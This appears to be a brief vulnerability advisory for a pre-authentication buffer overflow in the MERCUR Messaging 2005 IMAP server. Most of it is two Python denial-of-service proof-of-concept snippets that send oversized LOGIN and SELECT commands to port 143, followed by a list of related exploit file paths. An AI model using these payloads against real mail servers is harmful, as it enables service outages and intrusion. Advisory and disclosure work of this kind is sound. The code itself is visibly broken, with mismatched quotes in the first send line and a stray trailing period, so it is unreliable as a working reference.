MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability

MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability

The following proof of concept is available:

-- DoS Exploit --
# Atrium Mercur IMAP 5.0 SP3 DoS Exploit
# pre authentifcation buffer overflow in imap command login
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login "\x41" * 275 + "\r\n")

# buffer overflow in imap commands like select and others
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login test test\r\n")
print s.recv(256)
s.send("a002 select " + "\x41" * 239 + "\r\n").

Exploit code as part of the Metasploit Framework project has been released.

/data/vulnerabilities/exploits/mercur.cpp
/data/vulnerabilities/exploits/mercur_imap_select_overflow.pm
/data/vulnerabilities/exploits/mercur-login-17138.pl
/data/vulnerabilities/exploits/17148Jan152007.pl